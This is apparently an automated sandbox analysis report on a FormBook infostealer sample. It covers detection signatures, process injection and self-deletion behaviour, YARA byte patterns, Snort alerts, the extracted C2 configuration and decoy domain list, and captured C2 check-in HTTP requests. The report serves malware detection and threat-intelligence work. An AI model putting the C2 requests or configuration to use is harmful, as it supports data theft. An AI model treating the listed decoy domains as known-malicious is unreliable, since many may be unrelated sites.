
Windows Analysis Report pago atrasado.exe

Overview

General Information

Sample Name: pago atrasado.exe
Analysis ID: 502137
MD5: f841c72b1c4cadc4c98903ad26a96a16
SHA1: 06359aaf42a5ce60889ab7a93d8af7702b34630a
SHA256: eaa038a0020fee7ddfe2919203f20f15ca1d7eb19d90b168cade93b5cf8d7f43
Tags: exe, Formbook, xloader

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
Injects a PE file into a foreign process
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file name differs from the original file name recorded in its version info
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read data from the clipboard

Process Tree

  • System is w10x64
  • pago atrasado.exe (PID: 4308 cmdline: 'C:\Users\user\Desktop\pago atrasado.exe' MD5: F841C72B1C4CADC4C98903AD26A96A16)
    • pago atrasado.exe (PID: 2840 cmdline: 'C:\Users\user\Desktop\pago atrasado.exe' MD5: F841C72B1C4CADC4C98903AD26A96A16)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • colorcpl.exe (PID: 248 cmdline: C:\Windows\SysWOW64\colorcpl.exe MD5: 746F3B5E7652EA0766BA10414D317981)
          • cmd.exe (PID: 4940 cmdline: /c del 'C:\Users\user\Desktop\pago atrasado.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.crisisinterventionadvocates.com/u9xn/"], "decoy": ["lifeguardingcoursenearme.com", "bolsaspapelcdmx.com", "parsleypkllqu.xyz", "68134.online", "shopthatlookboutique.com", "canlibahisportal.com", "oligopoly.city", "srchwithus.online", "151motors.com", "17yue.info", "auntmarysnj.com", "hanansalman.com", "heyunshangcheng.info", "doorslamersplus.com", "sfcn-dng.com", "highvizpeople.com", "seoexpertinbangladesh.com", "christinegagnonjewellery.com", "artifactorie.biz", "mre3.net", "webbyteanalysis.online", "medicmir.store", "shdxh.com", "salvationshippingsecurity.com", "michita.xyz", "itskosi.com", "aligncoachingconsulting.com", "cryptorickclub.art", "cyliamartisbackup.com", "ttemola.com", "mujeresenfarmalatam.com", "mykombuchafactory.com", "irasutoya-ryou.com", "envtmyouliqy.mobi", "expert-rse.com", "oddanimalsink.com", "piezoelectricenergy.com", "itservices-india.com", "wintwiin.com", "umgaleloacademy.com", "everythangbutwhite.com", "ishhs.xyz", "brandsofcannabis.com", "sculptingstones.com", "hilldetailingllc.com", "stone-project.net", "rbrituelbeaute.com", "atzoom.store", "pronogtiki.store", "baybeg.com", "b148tlrfee9evtvorgm5947.com", "msjanej.com", "western-overseas.info", "sharpecommunications.com", "atlantahomesforcarguys.com", "neosudo.com", "blulacedefense.com", "profilecolombia.com", "blacksaltspain.com", "sejiw3.xyz", "saint444.com", "getoken.net", "joycegsy.com", "fezora.xyz"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
  • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group |
  • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
  • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
  • 0x16af8:$sqlite3text: 68 38 2A 90 C5
  • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
  • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
  • 0x46a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x4191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x47a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0xac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
1.1.pago atrasado.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
1.1.pago atrasado.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
  • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.1.pago atrasado.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group |
  • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
  • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
  • 0x16af8:$sqlite3text: 68 38 2A 90 C5
  • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
  • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
1.2.pago atrasado.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
1.2.pago atrasado.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
  • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp | Malware Configuration Extractor: FormBook (C2 list and decoy domains as listed under Malware Configuration above)
Yara detected FormBook
Source: Yara match | File source: 1.1.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.pago atrasado.exe.2330000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.pago atrasado.exe.2330000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, type: MEMORY
Machine Learning detection for sample
Source: pago atrasado.exe | Joe Sandbox ML: detected
Source: 0.2.pago atrasado.exe.2330000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 16.2.colorcpl.exe.4a4796c.4.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 16.2.colorcpl.exe.2b2c88.1.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 1.2.pago atrasado.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.1.pago atrasado.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: pago atrasado.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: colorcpl.pdbGCTL | source: pago atrasado.exe, 00000001.00000002.327276708.0000000002970000.00000040.00020000.sdmp
Source: Binary string: colorcpl.pdb | source: pago atrasado.exe, 00000001.00000002.327276708.0000000002970000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP | source: pago atrasado.exe, 00000000.00000003.243423683.000000000F230000.00000004.00000001.sdmp, pago atrasado.exe, 00000001.00000003.248757919.0000000000670000.00000004.00000001.sdmp, colorcpl.exe, 00000010.00000002.516530503.000000000462F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: pago atrasado.exe, colorcpl.exe
Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 0_2_00405E93 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 0_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 0_2_00402671 FindFirstFileA,
Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 4x nop then pop ebx

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49790 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49790 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49790 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49793 -> 74.208.236.134:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49793 -> 74.208.236.134:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49793 -> 74.208.236.134:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49797 -> 3.64.163.50:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49797 -> 3.64.163.50:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49797 -> 3.64.163.50:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Domain query: www.crisisinterventionadvocates.com
Source: C:\Windows\explorer.exe | Domain query: www.ttemola.com
Source: C:\Windows\explorer.exe | Network Connect: 208.91.197.27 80
Source: C:\Windows\explorer.exe | Network Connect: 3.64.163.50 80
Source: C:\Windows\explorer.exe | Network Connect: 46.101.121.244 80
Source: C:\Windows\explorer.exe | Network Connect: 74.208.236.134 80
Source: C:\Windows\explorer.exe | Domain query: www.baybeg.com
Source: C:\Windows\explorer.exe | Domain query: www.everythangbutwhite.com
Source: C:\Windows\explorer.exe | Domain query: www.highvizpeople.com
Source: C:\Windows\explorer.exe | Domain query: www.itskosi.com
Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe | Domain query: www.oddanimalsink.com
Source: C:\Windows\explorer.exe | Domain query: www.ishhs.xyz
Source: C:\Windows\explorer.exe | Domain query: www.sfcn-dng.com
Source: C:\Windows\explorer.exe | Domain query: www.umgaleloacademy.com
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe | DNS query: www.ishhs.xyz
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.crisisinterventionadvocates.com/u9xn/
Source: Joe Sandbox View | ASN Name: CONFLUENCE-NETWORK-INCVG CONFLUENCE-NETWORK-INCVG
Source: Joe Sandbox View | ASN Name: AMAZON-02US AMAZON-02US
Source: global traffic | HTTP traffic detected: GET /u9xn/?z0=rzasM82ZF5Q0VpfmrNE4kv3GDdRAHDJpM3U8JxcA+ITN6WDsXwhhZ+Z3rxJnSB0jHUWg&PjlT=JhfHclW8zdo HTTP/1.1 | Host: www.highvizpeople.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /u9xn/?z0=Eyy2FmThgSczREyJUe5BPhqJIrAJD2iL3N0sS7pth5V4AuiiYZbYrcKb75E1rnMpvjAp&PjlT=JhfHclW8zdo HTTP/1.1 | Host: www.oddanimalsink.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /u9xn/?z0=Q2BOOCh2YmRGzHBLpF4ZGgsAfzPJKYPCPJSLTy3o+TqCnIZHYQwJa/p1Zgpwk24Ey+uX&PjlT=JhfHclW8zdo HTTP/1.1 | Host: www.itskosi.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /u9xn/?z0=LAjf/xx2BjlKOSx2Nw0FybGnOLdFfrA16q3xOuIsu5dbrvvju1demR4HH9h71lmoA2bo&PjlT=JhfHclW8zdo HTTP/1.1 | Host: www.crisisinterventionadvocates.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /u9xn/?z0=a5IGPNkliMrRjEJlFMTr6wLc8iEcWRvcvuUq3Ax8SYLvcABDJqlPe7bn0Dwhj5qYaiRJ&PjlT=JhfHclW8zdo HTTP/1.1 | Host: www.everythangbutwhite.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 208.91.197.27 208.91.197.27
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: openresty | Date: Wed, 13 Oct 2021 14:44:25 GMT | Content-Type: text/html | Content-Length: 275 | ETag: "615f9601-113" | Via: 1.1 google | Connection: close | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html | Content-Length: 626 | Connection: close | Date: Wed, 13 Oct 2021 14:44:46 GMT | Server: Apache | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.eot
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.eot?#iefix
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.otf
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.svg#open-sans-bold
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.ttf
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.woff
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.woff2
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.eot
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.eot?#iefix
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.otf
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.svg#open-sans
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.ttf
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.woff
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.woff2
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/js/min.js?v2.3
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/27586/searchbtn.png)
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/27587/BG_2.png)
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/27587/Left.png)
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/27587/Right.png)
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
          Source: pago atrasado.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: pago atrasado.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://www.Highvizpeople.com
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://www.everythangbutwhite.com
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://www.everythangbutwhite.com/
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://www.highvizpeople.com/10_Best_Mutual_Funds.cfm?fp=lEL3szcLRiQ3X72dJydtT9fP1DR49HnC0B3XMUp8zSX
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://www.highvizpeople.com/Accident_Lawyers.cfm?fp=lEL3szcLRiQ3X72dJydtT9fP1DR49HnC0B3XMUp8zSX%2FL
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://www.highvizpeople.com/Best_Penny_Stocks.cfm?fp=lEL3szcLRiQ3X72dJydtT9fP1DR49HnC0B3XMUp8zSX%2F
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://www.highvizpeople.com/Migraine_Pain_Relief.cfm?fp=lEL3szcLRiQ3X72dJydtT9fP1DR49HnC0B3XMUp8zSX
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://www.highvizpeople.com/__media__/design/underconstructionnotice.php?d=highvizpeople.com
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://www.highvizpeople.com/__media__/js/trademark.php?d=highvizpeople.com&type=ns
